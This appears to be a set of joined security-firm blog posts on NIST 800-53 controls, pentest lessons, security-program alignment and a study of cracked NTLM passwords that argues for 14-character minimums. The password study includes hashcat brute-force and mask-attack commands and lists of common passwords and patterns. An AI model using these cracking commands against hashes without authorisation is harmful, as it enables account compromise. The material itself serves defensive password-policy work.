For this breach, let’s look at NIST 800-53, an extremely deep and complete framework, consisting of 18 control families. It is divided into Low, Moderate, and High implementations based on the system impact level. We will assume “Low” for this analysis, which contains 115 controls to be considered (see https://nvd.nist.gov/800-53/Rev4/impact/low). Here are a few of the controls that are directly applicable to each of the steps in the breach:

  1. PS-7: THIRD-PARTY PERSONNEL SECURITY; RA-3: RISK ASSESSMENT
  2. AC-17: REMOTE ACCESS; RA-5: VULNERABILITY SCANNING
  3. AC-3: ACCESS ENFORCEMENT; CM-7: LEAST FUNCTIONALITY; SI-4: INFORMATION SYSTEM MONITORING
  4. AC-2: ACCOUNT MANAGEMENT; IA-2: IDENTIFICATION AND AUTHENTICATION (ORGANIZATIONAL USERS)
  5. AU-6: AUDIT REVIEW, ANALYSIS, AND REPORTING; SE-1: INVENTORY OF PERSONALLY IDENTIFIABLE INFORMATION
  6. CM-5: ACCESS RESTRICTIONS FOR CHANGE; SI-16: MEMORY PROTECTION,  
  7. SC-7: BOUNDARY PROTECTION; SC-8: TRANSMISSION CONFIDENTIALITY AND INTEGRITY

Note that I said “a few of the controls…” The above is just a quick sampling of controls that would have prevented, or at least minimized, the damage done in the breach. Other controls would also come into play: some controls address documentation, some address enterprise-level controls, and some address application-level controls. The key is, they work together and rely on each other.

Here is an example:

SC-7 is documented this way on the nist.gov website –

SC-7 BOUNDARY PROTECTION

Control Description

The information system:
a. Monitors and controls communications at the external boundary of the system and at key internal boundaries within the system;
b. Implements subnetworks for publicly accessible system components that are [Selection: physically; logically] separated from internal organizational networks; and
c. Connects to external networks or information systems only through managed interfaces consisting of boundary protection devices arranged in accordance with an organizational security architecture.

Related to: AC-4, AC-17, CA-3, CM-7, CP-8, IR-4, RA-3, SC-5, SC-13

CM-7 is in the “Related to:” section, which lists controls that rely on each other in one or both directions. Here is CM-7 -

CM-7 LEAST FUNCTIONALITY

Control Description

The organization:
a. Configures the information system to provide only essential capabilities; and
b. Prohibits or restricts the use of the following functions, ports, protocols, and/or services: [Assignment: organization-defined prohibited or restricted functions, ports, protocols, and/or services].

Related to: AC-6, CM-2, RA-5, SA-5, SC-7

Each control has related controls, which is why proper implementation of the entire framework is essential to maximizing the benefits.

So how do you start? Pick your idiom: It’s like writing a novel, eating an elephant, mailing a jeep home, drinking a half barrel of beer. You do it one page, one bite, a few parts, or one glass at a time.

Which framework should you select? Statistically, according to Tenable’s Trends in Security Framework Adoption Survey (https://www.tenable.com/whitepapers/trends-in-security-framework-adoption) released in 2018, 84% of organizations in the US leverage a security framework, with the top 4 being:

  1. PCI DSS (47%)
  2. ISO 27001/27002 (35%)
  3. CIS Critical Security Controls (32%)
  4. NIST Framework for Improving Critical Infrastructure Security (29%)

Look first to your organization and/or your customers. If you are in manufacturing, and have adopted ISO for your manufacturing standards, then the ISO 27000 series (specifically ISO/IEC 27001:2013) probably makes sense. If your organization will be relying on credit card processing, then the PCI DSS framework may be mandatory. If your client base includes governmental entities, then NIST will be a requirement.

So, consider this your crash warning indicator light. It is blinking, and you should probably do something about it!

“The first step towards getting somewhere is to decide that you are not going to stay where you are.”

-Chauncey Depew

Information security has officially given me a few gray hairs, so I'm writing this article from the perspective of someone who's been around the block. With over 15 years in information security, I feel like I've seen it all. And while I can't claim to be a great penetration tester myself, I can say that I work with (and have worked with) some truly talented pentesters. I can also confidently state that I've read more pentest reports than most.

So, having this background… I get asked by businesses and defenders all the time, "What advice would you give?" and, "What lessons can be learned?"

Well, thanks for asking…. (insert deep breath here)

1. P@ssw0rds are still w3$k!

In fact, we've known that passwords are a weak form of authentication since the moment the first password-based authentication system was created. Passwords can be weak for several compounding reasons: their limited length and complexity (keyspace), and the fact that they can be shared, guessed, written down, or reused. Let's face it, they provide almost no security. Until we stop using passwords or ensure that every last account has a strong and unique password that can't be guessed or cracked, we accept significant risk.


2. Multifactor authentication (MFA) is not enabled or required for all remote access

While it is almost commonplace now to find MFA on VPNs, we still find roles, groups, and even URLs that allow MFA to be bypassed. Further, other types of remote access like Citrix, Remote Desktop, Outlook Web Access, and SSH are often overlooked. Remember that when passwords are weak (and they probably are), attackers will be quick to take advantage when MFA is not enforced.


3. Two wrongs don't make a right

Your mom said it, and now I will too. In SynerComm's pentest reports, we consider both #1 and #2 to be high-severity findings; when combined, they result in a critical weakness. Password spraying allows an attacker to easily guess common passwords (think Summer19) and gain immediate access to email and internal networks.


4. Vulnerability scanners provide a false sense of security

Don't get me wrong, get your EternalBlue and Heartbleed patched, but don't think that being well patched makes you secure. Vulnerability scanning is important, but at its best, it discovers live systems, missing patches, default credentials, weak services, and other well-known vulnerabilities. What it doesn't tell you is that your systems may already include a roadmap to access anything and everything on your network.

Pentesters, just like modern attackers, typically don't rely on missing patches to traverse networks, gather privileges, and access protected data. No vulnerability scanner will warn you that all laptops share the same local administrator password or that a domain admin RDP'd into one of them to troubleshoot an issue (and left their cleartext password cached in memory).


5. Your next-generation firewall and endpoint solution could also provide a false sense of security

Again, don't get me wrong, I am a big fan of solutions like Palo Alto and CrowdStrike.  BUT, simply purchasing and deploying these solutions doesn't make your networks and systems more secure. Like any control, all security solutions must be configured, tuned, and VALIDATED.

Lesson #5: It isn't uncommon to find best-of-breed security controls running in a "monitor only" or "log only" state. After all, the easiest way to start is to convert that old layer 3 ASA config and turn on the security features later. And let's not forget that ALL IT EMPLOYEES should always be whitelisted in these controls because we don't need that stuff in our way.


6. Maybe this should be #1, but I hope we've all got this figured out… Compliance does not result in security

Contractual, industry, and especially regulatory compliance are all important, but don't let compliance get in the way of being secure. Information security programs should be designed to protect the confidentiality, integrity, availability, and usefulness of information; compliance should just be a benefit of good security.


7. Last, but not least… If you develop your own apps, contract out app development, or acquire custom-developed applications, assess them!

Secure coding isn't a new concept, but it is (unfortunately) still new to many developers. Widely used and commercial off-the-shelf (COTS) applications are heavily scrutinized, but your custom applications may just be waiting for the right attacker to come along. A lesson worth sharing is that a breach can be far more costly than validating, and potentially fixing, issues before the attack.


If you've made it to this point, thank you for reading through. This often isn't what people expect or even want to hear, but sometimes honesty is blunt and surprising. My advice: always start with a solid foundation and then build on it. Use frameworks like the CIS Top 20 to provide a prioritized roadmap, and don't get caught skipping ahead. Good security can be as simple as keeping to the basics.

The Challenge

You budget for, enable, and staff your organization’s information security program with people, technology, and visionary prowess. As you step back and observe, do you find yourself wondering: Does the business consider the program relevant? Is my security program effective? In a business environment where resources are limited, compliance requirements abound, and budgets are constantly challenged to meet cost containment targets, this article will explore a strategy to align information technology (IT), information security (IS) (note: one is not necessarily inclusive of the other – a topic for another article), system and data owners (SDO), aka your business units, and leadership.

The Opportunity

Aligning IT, IS, SDO, and leadership will strengthen information systems’ value and inherent information security situational awareness – an awareness I would argue is incorrectly shouldered by IT. When it comes to managing information assets to assure the confidentiality, integrity, and availability (CIA) of an organization’s systems and data, what roles are in play? Good question; here are the primary ones found in any organization, with roles defined:

How can you effectively secure what you do not fully understand? Effectively securing an organization’s systems and data requires a clear understanding, outside of IT, of information systems’ value and risk. Components of a total information systems picture may include:

An effective communications strategy will strengthen information systems’ alignment between IT, IS, and the business. When an organization raises the level of awareness with the “total information systems picture”, a business process will take hold that facilitates system discussions leading to meaningful system decisions. While there can be many types of system decisions organizations must consider, a few examples may include:

The Plan

A strategy for enabling effective communications will look different from one organization to another. A communications strategy should consider an organization’s unique characteristics, culture, and climate. Activities that can contribute to enabling an effective communications strategy should include:

Planning, execution, and effective communications can produce meaningful results and help ensure your information security program is experienced as relevant.

Background

While experts have agreed for decades that passwords are a weak method of authentication, their convenience and low cost have kept them around. Until we stop using passwords or start using multi-factor authentication (for everything), a need for stronger passwords exists. And as long as people create their own passwords that must be memorized, those passwords will remain weak and guessable. This blog/article/rant covers a brief background of password cracking as well as the justification for SynerComm’s 14-character password recommendation.

First things first: What is a password?

Authentication is the process of verifying the identity of a user or process, and a password is the only secret “factor” used in authentication. For the authentication process to be trusted, it must positively identify the account owner and thwart all other attempts. This is critical, because access and privileges are granted based on the user’s role. Considering how easily passwords can be shared, most have already concluded that passwords are an insufficient means of authenticating people. We must also consider that people must memorize their passwords, and that they often need passwords on dozens if not hundreds of systems. Because of this, humans create weak, easily guessed, and often reused passwords.

Password Controls

Over the years, several password controls have emerged to help strengthen password security, including minimum password length, complexity, preventing reuse, and a recurring requirement to create new passwords. While it is a mathematical fact that longer passwords and a larger key space (more possible characters) do indeed create stronger passwords, we now know that regularly changing one’s password provides no additional security. In fact, forcing users to regularly create new and complex passwords weakens security: it forces users to create guessable patterns or simply write their passwords down. OK, I will stop here; we'll save the ridiculousness of password aging for a future blog.

So Why 14 Characters?

So why is 14 characters the ideal or best recommended password length? It is not. It is merely a minimum length; we still prefer to see people using even longer passwords (or doing better than passwords in the first place). SynerComm recommends a 14-character minimum for several reasons. First, 14-character passwords are very difficult to crack. Most passwords containing 9 characters or fewer can be brute-force guessed in under 1 day with a modern password cracking machine. Passwords with 10-12 characters, and even 13-14 characters, can still be easily guessed if they are based on a word and a 4-digit number. (Consider Summer2018! or your child’s name and birthday.) Next, and perhaps more importantly, a 14-character minimum will prevent bad password habits and promote good ones. When paired with security awareness training, users can be taught to create and use passphrases instead of passwords. Passphrases can be sentences, combinations of words, etc. that are meaningful and easy to remember. Finally, 14 characters is the largest “Minimum Password Length” currently allowed by Microsoft Windows. While Windows supports very long passwords, it is not simple to enforce a minimum greater than 14 characters (PSOs can be used to increase this in Windows 2008 and above, and registry hacks for anything older, but it can be a tedious process and introduces variables into the management and troubleshooting of your environment).

The remainder of this article provides facts and evidence to support our recommendations.

Analysis of Password Length

SynerComm collected over 180,000 NTLM password hashes from various breached domain controllers and attempted to crack them using dictionary, brute-force, and cryptanalysis attacks. The chart below shows the password lengths of the more than 93,000 passwords cracked. It is interesting to find passwords that fall drastically below the usual minimum length of eight characters. Although few, it is also worth noting that 20, 21, and 22-character passwords (along with one 27-character password) were cracked in these analyses.
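For reference, a distribution like the one below can be reproduced from any cracked-password list with a one-liner (a sketch, assuming one password per line in a file named cracked.txt):

awk '{ print length($0) }' cracked.txt | sort -n | uniq -c    # count of cracked passwords at each length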

Passwords Cracked = 93,706. Total unique entries of those passwords cracked = 68,161
Passwords of 9 or fewer characters account for 50% of those cracked; 12 or fewer, 75%
Password Length - Number of Cracked Passwords
1 = 3 (0.0%)
2 = 2 (0.0%)
3 = 137 (0.15%)
4 = 27 (0.03%)
5 = 405 (0.43%)
6 = 1527 (1.63%)
7 = 3827 (4.08%)
8 = 26191 (27.95%)
9 = 23677 (25.27%)
10 = 17564 (18.74%)
11 = 9098 (9.71%)
12 = 6267 (6.69%)
13 = 2915 (3.11%)
14 = 1063 (1.13%)
15 = 577 (0.62%)
16 = 276 (0.29%)
17 = 81 (0.09%)
18 = 39 (0.04%)
19 = 13 (0.01%)
20 = 10 (0.01%)
21 = 1 (0.0%)
22 = 4 (0.0%)
23 = 0 (0.0%)
24 = 0 (0.0%)
25 = 0 (0.0%)
26 = 1 (0.0%)
27 = 1 (0.0%)

Analysis of Password Composition

*Note: The password "acme" was used to replace specific company names. For example, if the password "synercomm123$" would have been found in a SynerComm password dump it would have been replaced with "acme123$". This change occurred only to serve the top 10 password and base word tables. Analyses of length and masks were performed without this change.

Top 10 passwords
Password1 = 543 (0.58%)
Summer2018 = 424 (0.45%)
Summer18 = 395 (0.42%)
acme80 = 368 (0.39%)
Fall2018 = 362 (0.39%)
Good2go = 350 (0.37%)
yoxvq = 345 (0.37%)
Gr8team = 338 (0.36%)
Today#08 = 308 (0.33%)
Spring2018 = 219 (0.23%)
Top 10 base words
password = 1993 (2.13%)
summer = 1663 (1.77%)
acme = 1619 (1.73%)
spring = 734 (0.78%)
fall = 706 (0.75%)
welcome = 652 (0.7%)
winter = 577 (0.62%)
w0rdpass = 562 (0.6%)
good2go = 351 (0.37%)
yoxvq = 345 (0.37%)
Last 4 digits (Top 10)
2018 = 3037 (3.24%)
2017 = 821 (0.88%)
1234 = 733 (0.78%)
2016 = 659 (0.7%)
2015 = 588 (0.63%)
2014 = 561 (0.6%)
2013 = 435 (0.46%)
2012 = 358 (0.38%)
2010 = 296 (0.32%)
2019 = 286 (0.31%)
Masks (Top 10)
?u?l?l?l?l?l?d?d (6315) (8 char)
?u?l?l?l?l?l?d?d?d?d (4473) (10 char)
?u?l?l?l?l?l?l?d?d (4021) (9 char)
?u?l?l?l?d?d?d?d (3328) (8 char)
?u?l?l?l?l?d?d?d?d (2985) (9 char)
?u?l?l?l?l?l?l?l?d?d (2742) (10 char)
?u?l?l?l?l?l?l?d (2601) (8 char)
?u?l?l?l?l?l?l?l?d (2371) (9 char)
?u?l?l?l?l?l?l?d?d?d?d (1794) (11 char)
?u?d?d?d?d?d?d?d?d (1756) (9 char)
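In these hashcat-style masks, ?u is an uppercase letter, ?l a lowercase letter, and ?d a digit, so the most common mask is exactly the "Summer18" shape. Quick keyspace arithmetic shows why that shape falls so quickly (any shell will do):

echo $(( 26 * 26**5 * 10**2 ))    # ?u?l?l?l?l?l?d?d keyspace: 30,891,577,600 candidates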

Password Hash Cracking Speeds

When performing our own password cracking, SynerComm uses a modern password cracker built with 8 powerful GPUs. Typically used by gamers to render realistic three-dimensional worlds, these graphics cards are remarkably efficient at performing the mathematical calculations required to defeat password hashing algorithms. Most 8-character passwords will crack in 4.5 hours or less. While the same attack against a 9-character password could take up to 18 days to complete, we can reduce the key space (the possible characters used in passwords) and complete 10-11 character attacks in just 1-2 days or less.
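For the curious, the attacks described above map directly onto hashcat syntax. A sketch, assuming a file of NTLM hashes named ntlm.hashes (-m 1000 selects NTLM, -a 3 selects a mask attack):

hashcat -m 1000 -a 3 ntlm.hashes ?a?a?a?a?a?a?a?a           # brute-force the full 8-character keyspace
hashcat -m 1000 -a 3 ntlm.hashes ?u?l?l?l?l?l?d?d?d?d       # targeted 10-character "Summer2018" shape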

Password Best Practices

  1. Do not share your password with anyone!
  2. Do not store passwords in spreadsheets, documents, or email! Also avoid storing passwords in your browser (IE, Firefox, Chrome).
  3. Create passphrases instead of passwords. Long passwords are always stronger than short passwords. Passwords shorter than 10 characters can be easily and quickly cracked if their hashes become available to the attacker. SynerComm recommends enforcing at least a 12-character minimum for standard user accounts but suggests using a 14-character minimum to promote good password creation methods. Privileged accounts such as domain administrators should have even longer passwords.
  4. While password complexity is less critical with long (>=14 char) passwords, it still helps ensure a larger key space. Encourage users to use less common characters such as spaces, commas, and any other special character found on the keyboard. (Spaces can make an enormous difference!)
  5. Never reuse the same password on multiple accounts. While it is easier to remember 1 password than 100, our next best practice provides a solution to that problem too. Dumps containing passwords from breaches are great starting places for guessing a user’s password.
  6. Use a password safe. Modern password managers can sync stored passwords between computers and mobile devices. By using a safe, most users only need to remember 2-3 passwords and the rest can be stored securely in a safe.
    1. When using a safe, it is best practice to allow the application to generate most passwords. This way you can create 15-20 character completely random passwords that you never need to know or memorize.
  7. Implement multi-factor authentication whenever possible. Passwords will always be a weak and vulnerable form of authentication. Using multi-factor greatly reduces the chances of a successful authentication attack. Multi-factor authentication should be used for ALL (no exceptions) remote access and should increasingly be considered for ALL privileged account access.

We created an infographic on this if you're more visual like me.

*For shared accounts (root, admin, etc.), restrict the number of people who have access to the password. Change these passwords anytime someone who could know the password leaves the organization.

~Brian Judd (@njoyzrd) with password analysis by Chad Finkenbiner
